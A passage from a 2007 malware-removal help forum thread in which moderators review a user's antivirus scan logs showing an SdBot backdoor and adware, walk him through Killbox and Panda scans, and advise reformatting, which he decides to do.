C:\WINDOWS\Sti_Trace.log Object is locked skipped
C:\WINDOWS\system32\ajj.exe Infected: not-a-virus:AdWare.Win32.Aureate.d skipped
C:\WINDOWS\system32\config\AppEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\default Object is locked skipped
C:\WINDOWS\system32\config\default.LOG Object is locked skipped
C:\WINDOWS\system32\config\SAM Object is locked skipped
C:\WINDOWS\system32\config\SAM.LOG Object is locked skipped
C:\WINDOWS\system32\config\SecEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\SECURITY Object is locked skipped
C:\WINDOWS\system32\config\SECURITY.LOG Object is locked skipped
C:\WINDOWS\system32\config\software Object is locked skipped
C:\WINDOWS\system32\config\software.LOG Object is locked skipped
C:\WINDOWS\system32\config\SysEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\system Object is locked skipped
C:\WINDOWS\system32\config\system.LOG Object is locked skipped
C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat Object is locked skipped
C:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\WINDOWS\system32\eraseme_21230.exe Infected: Backdoor.Win32.SdBot.aad skipped
C:\WINDOWS\system32\h323log.txt Object is locked skipped
C:\WINDOWS\system32\i Infected: Trojan-Downloader.BAT.Ftp.ab skipped
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA Object is locked skipped
C:\WINDOWS\Temp\kav1.tmp Object is locked skipped
C:\WINDOWS\wiadebug.log Object is locked skipped
C:\WINDOWS\wiaservc.log Object is locked skipped
D:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP217\change.log Object is locked skipped
F:\Zip\GDiVX 1.9.1.exe/data0007/SaveNow.exe Infected: not-a-virus:AdWare.Win32.SaveNow.w skipped
F:\Zip\GDiVX 1.9.1.exe/data0007/Uninst.exe Infected: not-a-virus:AdWare.Win32.SaveNow.au skipped
F:\Zip\GDiVX 1.9.1.exe/data0007 Infected: not-a-virus:AdWare.Win32.SaveNow.au skipped
F:\Zip\GDiVX 1.9.1.exe NSIS: infected - 3 skipped

Scan process completed.
Go to the top of the page
 
+Quote Post
rridgely
post Feb 12 2007, 09:20 PM
Post #17


I hate computers
Group Icon

Group: Moderators
Posts: 8,645
Joined: 12-April 05
Member No.: 1,352
Download Killbox from Here

Click killbox.exe

Select the option "Delete on reboot".

Click the button: All Files (Important!)
Now it should flash green.

Next copy the contents of the code box to clipboard by left clicking and covering the text then right click inside the highlighted area and choose Copy:

CODE
C:\WINDOWS\system32\eraseme_21230.exe
C:\WINDOWS\system32\i
C:\WINDOWS\system32\ajj.exe


After copying the above text to Clipboard click File on the killbox menu bar and choose Paste From Clipboard

Then press the Delete File button (Red Circle with a White X).
Killbox will tell you that all listed files will be removed on next reboot and asks if you would like to Reboot now, click YES
If you don't get that message, reboot manually.

Your computer should reboot now.

Then after reboot upload the C:\!Killbox folder to the same topic they opened at Spykillers, may also be worth trying a different scanner such as panda to make sure there's nothing else to remove

[code]Run Panda Activescan from Here.

Once you are on the Panda site click the Scan your PC button
- A new window will open...click the Check Now button
- Enter your Country
- Enter your State/Province
- Enter your e-mail address and click send
- Select either Home User or Company
- Click the big Scan Now button
- If it wants to install an ActiveX component allow it
- It will start downloading the files it requires for the scan
(Note: It may take a couple of minutes)
- When the download is complete, click on Local Disks to start the scan
- When the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location so you can post it back.


--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide

Want to know how to protect your clean computer from viruses and spyware? The please follow the Malware Prevention Guide

Looking for good free security software?(or other great free stuff) The please take a look at the Recommended Security Applications Guide
Go to the top of the page
 
+Quote Post
Buchi
post Feb 13 2007, 11:28 AM
Post #18


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
1) I RAN KILLBOX.EXE AND FOLLOWED YOUR INSTRUCTIONS, BUT I COULDN'T UPLOAD IKILL FOLDER, MY INTERNET CONNECTION GETTING VERY SLOW!!!!! ANY SUGGESTION ABOUT HOW TO CORRECT THIS DEAD SLOW INTERNET CONNECTION? PLEASE ADVISE.

2) PANDA SCAN REPORT:

Incident Status Location

Adware:adware/ipinsight Not disinfected c:\windows\system32\sentry.sys
Adware:adware/powerstrip Not disinfected Windows Registry
Virus:W32/Sdbot.ftp.worm Disinfected C:\!KillBox\( 1)
Spyware:Cookie/PointRoll Not disinfected C:\Documents and Settings\Sys\Cookies\sys@ads.pointroll[2].txt
Spyware:Cookie/Advertising Not disinfected C:\Documents and Settings\Sys\Cookies\sys@advertising[1].txt
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Sys\Cookies\sys@atdmt[2].txt
Spyware:Cookie/Casalemedia Not disinfected C:\Documents and Settings\Sys\Cookies\sys@casalemedia[2].txt
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@doubleclick[1].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@fastclick[1].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@media.fastclick[1].txt
Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Sys\Cookies\sys@overture[1].txt
Spyware:Cookie/Tribalfusion Not disinfected C:\Documents and Settings\Sys\Cookies\sys@tribalfusion[2].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SDFix.exe[SDFix\apps\Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitFraudFix\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.zip[SmitfraudFix/Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\apps\Process.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\backups\backups.zip[backups/i]
Adware:Adware/Aureate-Radiate Not disinfected C:\WINDOWS\system32\GMAGlue.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\WINDOWS\system32\i
Potentially unwanted tool:Application/Processor Not disinfected C:\WINDOWS\system32\Process.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.001
Adware:Adware/Aureate-Radiate Not disinfected F:\Zip\Group Mail Plus v3.4.071 with serial\infactagmplus.exe[GMAGLUE.EXE]
Go to the top of the page
 
+Quote Post
AndyManchesta
post Feb 13 2007, 02:16 PM
Post #19


Power Member
Group Icon

Group: Spyware Moderators
Posts: 1,821
Joined: 12-January 06
From: Manchester. UK
Member No.: 3,836
Hi Buchi and RRidgely wink.gif

Buchi can you right click the C:\!Killbox folder and choose Send To > Compressed (zipped) Folder then upload the C:!Killbox.zip folder to Spykillers, the file that has been uploaded is a log file from killbox but its the files inside the folder that Id like to test,

You appear to still have an active backdoor infection on your system, SDFix removed the i file in the system32 folder but it was then found again by Kaspersky, Killbox was then used to remove it and now its been found again by Pandascan so something is putting the file back each time its removed

Anytime a backdoor is found a format and reinstall of the OS should be considered as it means the attacker has full access to your system (in this case using IRC channels), we will of course do our best to clean the computer of any infections that we can see but depending on what this system is used for you may want to consider reinstalling Windows to be sure its safe to use in the future (for logging into confidential sites such as banking, Paypal, Ebay, Email etc... )

Please read through this topic as it applies to your situation:

When Should I Format, How Should I Reinstall

Should you wish to continue with the cleanup then please upload the C:\Killbox.zip folder to SpyKillers so I can check the eraseme_(random number) file as its a backdoor trojan installer, I can then see what files or services its attempting to add which may help to find the solution, please also post a new HijackThis log into this thread and let us know if this system is connected to a home network,

Finally please post the contents of the Add/Remove screen to make sure there is no additional malware programs listed

Open Hijackthis, and click the Misc Tools button.
Then click the Open Uninstall Manager... button.
The Add/Remove Programs Manager panel should appear.
In this panel click the Save list button.
Save the uninstall_list.txt file to your desktop and copy and paste the contents back in your next reply.

Thanks

Andy
Go to the top of the page
 
+Quote Post
Buchi
post Feb 15 2007, 12:23 PM
Post #20


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
Thank you Rridgely & Andy, I decided to format my system and install the components again, as it is safe & secure for important data.
Besides my knowledge is also not sufficient enough to do more tougher works.
I really appreciate Rridgely for his best support offered to me, but I think my system is highly infected.
THANK YOU SO MUCH RRIDGELY AND ANDY rolleyes.gif
Go to the top of the page
 
+Quote Post
« Next Oldest · Spyware Hell · Next Newest »
 

2 Pages V   1 2 >
Reply to this topicStart new topic

 

Display Mode: Standard · Switch to: Linear+ · Switch to: Outline

Track this topic · Email this topic · Print this topic · Subscribe to this forum

RSS Lo-Fi Version Time is now: 21st November 2009 - 05:14 AM
Powered By IP.Board 2.3.6 © 2009  IPS, Inc.